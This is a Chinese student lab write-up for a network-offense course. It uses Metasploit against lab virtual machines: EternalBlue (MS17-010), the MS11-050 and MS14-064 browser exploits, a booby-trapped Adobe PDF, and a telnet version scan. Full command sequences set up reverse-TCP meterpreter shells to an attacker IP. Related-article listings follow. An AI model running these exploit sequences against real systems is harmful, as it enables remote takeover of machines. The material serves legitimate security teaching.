实验内容

metasploit中有六个模块分别是
渗透攻击模块(Exploit Modules)
辅助模块(Auxiliary Modules
攻击载荷(Payload Modules)
空字段模块(Nop Modules)
编码模块(Encoders)
后渗透攻击模块(Post)
本次实验使用的是exploit和auxiliary

基础题目

exploit就是通过一个小小的漏洞将自己的恶意代码植入目标主机从而达到攻击的目的,指的是一种攻击的手段

payload就相当于是一段恶意代码,或者说是一个装有恶意代码的容器,通过载荷就可以控制目标主机

encode是编码器,就是通过编码将恶意代码进行封装或伪装,使其不被目标主机检测为恶意软件

实验一 一个主动攻击实践(ms17—010)

靶机:windows2008server

(1)打开MSF输入nmap -O -Pn 192.168.1.126

利用auxiliary辅助模块进行扫描:

输入back退回,然后依次输入:
~
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set RHOST 192.168.1.126
exploit

~

实验二 对浏览器攻击时间(MS11-050/ms14-064)

1.MS11-050攻击(失败)

靶机:windows2008server

打开msf,输入
~
use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.1.126
set LPORT 5319
set URIPATH 5319gjt
exploit
~

结果失败了。

2.ms14-064(成功)

靶机:windowsXP

打开msf,输入下列指令:
~
use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
set URIPATH gjt
exploit
~

然后将给出的链接复制以后,在靶机IE上打开,可以成功回连。

实验3 用adobe进行攻击(adobe_cooltype_sing)

打开msf,输入下列指令
~
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
set FILENAME 20165319
exploit
~

创建出带有学号的pdf文件

将pdf复制到靶机上,靶机打开pdf。

输入下列指令:
~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.107
set LPORT 5319
exploit
~
攻击成功,kali回连。

实验4 辅助工具应用

运用了一个简单的扫描工具。

利用telnet来扫描
输入以下指令
~
use auxiliary/scanner/telnet/telnet_version 使用该模块

set RHOSTS 192.168.146.0/24 进行整个网段扫描

set THREADS 5319设置线程,这个数值可以自己定义

run

~

实验中遇到的问题

这次做浏览器攻击时,失败了大概7个漏洞,经查找资料发现,首先要改成tcp连接模式,其次,LHOST和SRVHOST的对象是kali攻击机而不是靶机。
另外对于不同的IE应该用不同的漏洞进行攻击。

实验体会

虽然经过这次实验成功实现了漏洞攻击,但是那是在靶机防火墙关闭,杀毒软件关闭的情况下,离实战应用还差很远。通过本次实验我再次意识到了网络的不安全性,一定要做好网络防卫工作。

2018-2019-2 20165319 《网络对抗技术》 Exp5:MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. Apache的安装与配置+PHP

     https://blog.csdn.net/u012130971/article/details/79284937 文件夹名称不要有空格

  2. Ceph rdb

    Ceph 独一无二地用统一的系统提供了对象.块.和文件存储功能,它可靠性高.管理简便.并且是自由软件. Ceph 的强大足以改变公司的 IT 基础架构.和管理海量数据. Ceph 可提供极大的伸缩性— ...

  3. NameNode与DataNode的工作原理剖析

    NameNode与DataNode的工作原理剖析 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 一.HDFS写数据流程 >.客户端通过Distributed FileSyst ...

  4. 1.8分布式集群模式基础(VM安装多台服务器)

    前言 一晃就是10几天,学习的过程是断断续续的,对个人来说,这并不是一个良好的状态.在这10几天了,迷恋起了PS... 从今天起,坚持一周4篇,额.希望吧 在之前的随笔中,我安装了Xshell 和 C ...

  5. [源码分析]AbstractStringBuilder

    [源码分析]AbstractStringBuilder Java中, AbstractStringBuilder是 StringBuilder 和 StringBuffer 的父类. 所以了解Stri ...

  6. Typora 使用说明

    目录 Typora是一款超简洁的markdown编辑器,具有如下特点: 完全免费,目前已支持中文 跨平台,支持windows,mac,linux 支持数学公式输入,图片插入 极其简洁,无多余功能 界面 ...

  7. HTTP深入浅出 http请求完整过程

    HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则.计算机专家设计出HTTP,使HTTP客户(如Web浏览器)能够从HTTP服务器(Web服务器)请求 ...

  8. PHP中的数组

    一.数组的基础 php数组的分类 按照下标的不同,php分为关联数组与索引数组: 索引数组:下标从零依次增长(以前那种) 关联数组:下标为字符串格式,每个下标字符串与数组的值一一关联对应(有点儿像对象 ...

  9. centos7.2 下 部署单节点redis 3.2.5

    #tar -xvf redis.3.2.5.tar.gz –C /usr/local/ #cd /usr/local/ #mv redis.3.2.5 redis #cd redis #make &a ...

  10. 找出链表中倒数第K个结点

    思路:两个指针,也是快指针和慢指针,先让快指针走k -1步,这时慢指针开始和快指针一起走到尾部.慢指针停止的点就是倒数第k个节点. public static ListNode findCountDo ...